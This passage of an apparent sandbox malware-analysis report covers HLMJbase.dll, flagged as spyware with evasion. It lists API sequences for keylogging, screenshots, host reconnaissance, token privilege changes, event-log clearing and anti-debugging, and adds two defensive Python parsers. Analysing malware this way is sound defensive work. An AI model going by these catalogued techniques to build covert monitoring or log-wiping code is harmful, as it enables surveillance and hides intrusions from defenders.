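Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DBE450 CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,3_2_04DBE450
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBF4268 NtDeviceIoControlFile,RtlNtStatusToDosError,3_2_6CBF4268
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBC3942 SetThreadErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,memmove,memmove,memmove,memmove,GetCurrentProcess,NtAllocateVirtualMemory,memmove,GetCurrentProcess,NtCreateThreadEx,GetCurrentProcess,FreeLibrary,CreateWaitableTimerExW,CreateWaitableTimerExW,SetWaitableTimer,WaitForSingleObject,CloseHandle,CloseHandle,Sleep,3_2_6CBC3942
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DBB3D0 ExitWindowsEx,3_2_04DBB3D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC3E8E0 EncryptMessage,3_2_6CC3E8E0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04210CAE3_2_04210CAE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]3_2_04DBE7B0
""".strip().splitlines()

if __name__ == "__main__":
    for fid, info in classify(SAMPLE_LINES).items():
        print(fid, info["capabilities"] or "(no APIs resolved)")
```

Feeding the full report export through classify() gives a per-function capability map that can be compared against the overview signatures; by_capability() is the view an analyst usually wants (which addresses implement keylogging, which implement screenshots) when deciding where to start in a debugger.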
Source: C:\Windows\SysWOW64\rundll32.exe | Code functions with no resolved API calls (flagged as potential crypto / string-decryption routines), process 3, 0x0420xxxx-0x0421xxxx region (also holds the recv loop 3_2_04203340): 3_2_04210CAE, 3_2_042024B0, 3_2_04212D61, 3_2_042111FF, 3_2_04211E2C, 3_2_0420B6A6, 3_2_04211750
Source: C:\Windows\SysWOW64\rundll32.exe | Code functions, process 3, 0x04DBxxxx-0x04DCxxxx region (outside the mapped DLL image; the same region holds the clipboard, keystroke, screenshot, drive-enumeration and ExitWindowsEx functions above, consistent with a stage loaded at run time rather than code in HLMJbase.dll on disk): 3_2_04DB6E60, 3_2_04DB6BE0, 3_2_04DB24A0, 3_2_04DCDDF0, 3_2_04DCD89F, 3_2_04DB8870, 3_2_04DCF9FF, 3_2_04DCEA1D, 3_2_04DC8381, 3_2_04DCE341
Source: C:\Windows\SysWOW64\rundll32.exe | Code functions, process 3, 0x6CBCxxxx-0x6CC6xxxx region (the mapped HLMJbase.dll image, where the HLMJbase.pdb string and the SSPI Encrypt/DecryptMessage wrappers were found): 3_2_6CC36D3C, 3_2_6CC1481F, 3_2_6CC1AA6C, 3_2_6CC08469, 3_2_6CC11C98, 3_2_6CC39CA8, 3_2_6CBC3942, 3_2_6CC290A8, 3_2_6CC54CCF, 3_2_6CC62C95, 3_2_6CC02D0F, 3_2_6CBEEE05, 3_2_6CBDCF24, 3_2_6CC128F9, 3_2_6CC62893, 3_2_6CC54898, 3_2_6CBFA814, 3_2_6CBCE875, 3_2_6CBCCAD0, 3_2_6CC18A77, 3_2_6CBF0B40, 3_2_6CBC8430, 3_2_6CBF653C, 3_2_6CC5A508, 3_2_6CBF255C, 3_2_6CBC66D9, 3_2_6CBDA64D, 3_2_6CC48780, 3_2_6CC24719, 3_2_6CBDC1AC, 3_2_6CC441F0, 3_2_6CC06291, 3_2_6CBEE3C7, 3_2_6CC52350, 3_2_6CC63CF4, 3_2_6CBCBDB1, 3_2_6CBD9D26, 3_2_6CC4BD70, 3_2_6CC3BD1C, 3_2_6CBEDD45, 3_2_6CBE5E16, 3_2_6CC4DFFE, 3_2_6CC49F40, 3_2_6CC23F75, 3_2_6CC618D7, 3_2_6CC43880, 3_2_6CC1BA52, 3_2_6CC59BE5, 3_2_6CC35B14, 3_2_6CBE54EF, 3_2_6CC4347E, 3_2_6CC0B537, 3_2_6CBCF61C, 3_2_6CC05674, 3_2_6CBDD0F7, 3_2_6CC41060, 3_2_6CC2D246, 3_2_6CC6524A, 3_2_6CC49370
Source: C:\Windows\SysWOW64\rundll32.exe | Code functions, process 3, 0x0466xxxx-0x0467xxxx region: 3_2_04677D40, 3_2_0467DD00, 3_2_0466659F, 3_2_04661E5F, 3_2_0467D7AF, 3_2_0466681F, 3_2_0467D25E, 3_2_0466822F, 3_2_0467F3BE
Source: C:\Windows\SysWOW64\rundll32.exe | Code functions, process 4: 4_2_03111750, 4_2_03111E2C, 4_2_0310B6A6, 4_2_03112D61, 4_2_031111FF, 4_2_031024B0, 4_2_03110CAE, 4_2_055A6E60 (the low 16 bits match process 3's 0x0421xxxx and 0x04DBxxxx entries, e.g. 4_2_03111750 and 3_2_04211750, 4_2_055A6E60 and 3_2_04DB6E60: the same code mapped at a different base in each process, so detections should key on behaviour or code bytes, not on these addresses)
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055A6BE04_2_055A6BE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055BDDF04_2_055BDDF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055A24A04_2_055A24A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055BF9FF4_2_055BF9FF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055A88704_2_055A8870
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055BD89F4_2_055BD89F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055BE3414_2_055BE341
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055B83814_2_055B8381
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055BEA1D4_2_055BEA1D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E5659F4_2_04E5659F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E67D404_2_04E67D40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E6DD004_2_04E6DD00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E51E5F4_2_04E51E5F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E6D7AF4_2_04E6D7AF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E5681F4_2_04E5681F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E6D25E4_2_04E6D25E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E5822F4_2_04E5822F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04E6F3BE4_2_04E6F3BE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030B17505_2_030B1750
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030B1E2C5_2_030B1E2C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030AB6A65_2_030AB6A6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030B2D615_2_030B2D61
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030B11FF5_2_030B11FF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030B0CAE5_2_030B0CAE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_030A24B05_2_030A24B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05356E605_2_05356E60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05356BE05_2_05356BE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0536DDF05_2_0536DDF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_053524A05_2_053524A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0536F9FF5_2_0536F9FF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_053588705_2_05358870
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0536D89F5_2_0536D89F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0536E3415_2_0536E341
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_053683815_2_05368381
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0536EA1D5_2_0536EA1D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04B9659F5_2_04B9659F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04BADD005_2_04BADD00
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04BA7D405_2_04BA7D40
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04B91E5F5_2_04B91E5F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04BAD7AF5_2_04BAD7AF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04B9681F5_2_04B9681F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04B9822F5_2_04B9822F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04BAD25E5_2_04BAD25E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04BAF3BE5_2_04BAF3BE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6CBC8880 appears 46 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 053642E0 appears 32 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6CC622D0 appears 145 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 055B42E0 appears 32 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6CC625D0 appears 47 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 04DC42E0 appears 32 times
Source: HLMJbase.dll | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
Source: HLMJbase.dll | Binary string: HandleAfdPollInfo\Device\Afd\Mio
Source: HLMJbase.dll | Binary string: Failed to open \Device\Afd\Mio:
Source: classification engine | Classification label: mal72.spyw.evad.winDLL@10/0@1/2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6CC49F40 memset,GetModuleHandleW,FormatMessageW,memmove,GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB75A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB76C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB7AF0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_055A75A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_055A76C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_055A7AF0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_053575A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_053576C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05357AF0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB6BE0 wsprintfW,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB5FE0 _memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB6620 wsprintfW,CoInitialize,CoCreateInstance,SysFreeString,SysFreeString,CoUninitialize
Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\2024.12.19
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7004:120:WilError_03
Source: HLMJbase.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\HLMJbase.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\HLMJbase.dll,NvOptimusEnablement
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",NvOptimusEnablement
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: HLMJbase.dll | Static file information: File size 1071104 > 1048576
Source: HLMJbase.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: HLMJbase.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: HLMJbase.pdb | source: rundll32.exe, 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3546373145.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.3546252526.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, HLMJbase.dll
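The "Static PE information" rows (EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL; DYNAMIC_BASE, NX_COMPAT; a DEBUG data directory; an executable .text section) come from three header fields: IMAGE_FILE_HEADER.Characteristics, IMAGE_OPTIONAL_HEADER.DllCharacteristics and the section headers. The parser below, an added example that is not part of the sandbox report, reads those fields from raw file bytes and lists which common hardening flags are absent; with the flags the report shows, GUARD_CF is the one missing. SAMPLE_PE is a constructed header-only PE32 stub whose flags mirror the report's rows, not the sample itself; point parse_pe_flags() at the real file bytes to reproduce the rows.

```python
"""Read the PE header fields behind the report's 'Static PE information' rows
(FileHeader.Characteristics, OptionalHeader.DllCharacteristics, the DEBUG data
directory and section flags) and list which hardening flags are absent.

Added example, not part of the sandbox report or of the sample. SAMPLE_PE is a
constructed header-only PE32 stub whose flags mirror the rows in the report."""
import struct

FILE_CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x1000: "SYSTEM",
    0x2000: "DLL",
}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x1000: "APPCONTAINER",
    0x4000: "GUARD_CF",
}
SECTION_FLAGS = {
    0x00000020: "CNT_CODE",
    0x00000040: "CNT_INITIALIZED_DATA",
    0x00000080: "CNT_UNINITIALIZED_DATA",
    0x20000000: "MEM_EXECUTE",
    0x40000000: "MEM_READ",
    0x80000000: "MEM_WRITE",
}
# Flags a 32-bit DLL built with a current toolchain is expected to carry (assumption).
EXPECTED_HARDENING = ("DYNAMIC_BASE", "NX_COMPAT", "GUARD_CF")
IMAGE_DIRECTORY_ENTRY_DEBUG = 6


def flag_names(value, table):
    """Names of the bits set in value, in ascending bit order."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe_flags(data):
    """Parse DOS/NT headers from raw file bytes; returns a dict of flag names."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    fh = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    machine, nsections, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20                                       # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    nrva_off = 92 if magic == 0x10B else 108                  # NumberOfRvaAndSizes
    nrva = struct.unpack_from("<I", data, opt + nrva_off)[0]
    debug_rva = debug_size = 0
    if nrva > IMAGE_DIRECTORY_ENTRY_DEBUG:
        debug_rva, debug_size = struct.unpack_from(
            "<II", data, opt + nrva_off + 4 + IMAGE_DIRECTORY_ENTRY_DEBUG * 8)
    sections = []
    sec = opt + opt_size                                # first IMAGE_SECTION_HEADER
    for _ in range(nsections):
        name = data[sec:sec + 8].rstrip(b"\0").decode("ascii", "replace")
        sec_flags = struct.unpack_from("<I", data, sec + 36)[0]
        sections.append((name, flag_names(sec_flags, SECTION_FLAGS)))
        sec += 40
    dll_names = flag_names(dll_chars, DLL_CHARACTERISTICS)
    return {
        "machine": machine,
        "characteristics": flag_names(chars, FILE_CHARACTERISTICS),
        "dll_characteristics": dll_names,
        "missing_hardening": [f for f in EXPECTED_HARDENING if f not in dll_names],
        "has_debug_directory": debug_rva != 0 and debug_size != 0,
        "sections": sections,
    }


def build_stub_pe():
    """Constructed header-only PE32 DLL: i386, one .text section, flags as in the report."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    file_header = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2122)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<H", opt, 70, 0x0140)                        # DYNAMIC_BASE | NX_COMPAT
    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + IMAGE_DIRECTORY_ENTRY_DEBUG * 8, 0x1000, 28)
    section = bytearray(40)
    section[:5] = b".text"
    struct.pack_into("<I", section, 36, 0x60000020)                # CODE | EXECUTE | READ
    return dos + b"PE\0\0" + file_header + bytes(opt) + bytes(section)


SAMPLE_PE = build_stub_pe()

if __name__ == "__main__":
    for key, value in parse_pe_flags(SAMPLE_PE).items():
        print(f"{key}: {value}")
```

A DEBUG directory plus the HLMJbase.pdb string in the next row means the build left its PDB path in the binary; the path itself is a useful pivot for clustering builds from the same environment.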
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_0420C52C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04209EF5 push ecx; ret 3_2_04209F08
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04217AFF push eax; retn 0000h 3_2_04217B05
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DD2450 push ebp; retf 3_2_04DD2474
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DD2470 push ebp; retf 3_2_04DD2474
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DDA0B8 push eax; ret 3_2_04DDA119
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DDA168 push eax; ret 3_2_04DDA119
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DC4325 push ecx; ret 3_2_04DC4338
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04673CE4 push ecx; ret 3_2_04673CF7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_03109EF5 push ecx; ret 4_2_03109F08
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_03117AFF push eax; retn 0000h 4_2_03117B05
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_055C2450 push ebp; retf 4_2_055C2474
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_055C2443 push ebp; retf 4_2_055C2474
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_055C2470 push ebp; retf 4_2_055C2474
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_055CA168 push eax; ret 4_2_055CA119
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_055CA0B8 push eax; ret 4_2_055CA119
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_055B4325 push ecx; ret 4_2_055B4338
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04E63CE4 push ecx; ret 4_2_04E63CF7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_030B7AFF push eax; retn 0000h 5_2_030B7B05
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_030A9EF5 push ecx; ret 5_2_030A9F08
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05372470 push ebp; retf 5_2_05372474
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05372450 push ebp; retf 5_2_05372474
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05372443 push ebp; retf 5_2_05372474
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_05364325 push ecx; ret 5_2_05364338
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04BA3CE4 push ecx; ret 5_2_04BA3CF7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DBB351 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 9025
Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 8975
Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 9047
Source: C:\Windows\SysWOW64\rundll32.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4444 | Thread sleep count: 299 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6344 | Thread sleep count: 9025 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6344 | Thread sleep time: -90250s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4948 | Thread sleep count: 293 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6640 | Thread sleep count: 8975 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6640 | Thread sleep time: -89750s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6740 | Thread sleep count: 230 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7024 | Thread sleep count: 9047 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7024 | Thread sleep time: -90470s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe | Thread sleep count: Count: 9025 delay: -10
Source: C:\Windows\SysWOW64\rundll32.exe | Thread sleep count: Count: 8975 delay: -10
Source: C:\Windows\SysWOW64\rundll32.exe | Thread sleep count: Count: 9047 delay: -10
Source: C:\Windows\SysWOW64\rundll32.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB8060 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB53C0 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW
Source: C:\Windows\System32\loaddll32.exe | Thread delayed: delay time: 120000
Source: rundll32.exe, 00000003.00000003.1730093952.000000000289D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3543030625.000000000287A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1698689251.000000000289E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1730125358.000000000289E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1698599756.000000000289D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1729791896.000000000289D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3542816522.0000000002E9C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1794106955.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1699780132.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04206510 IsDebuggerPresent
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DC04AB VirtualProtect ?,-00000001,00000104,?
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_0420C52C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_046600CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_04E500CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_04B900CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_042142C7 GetProcessHeap
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04206530 SetUnhandledExceptionFilter,GetConsoleWindow,ShowWindow,GetCurrentThreadId,PostThreadMessageA,GetInputState,CreateThread,WaitForSingleObject,CloseHandle,Sleep
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_042069D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
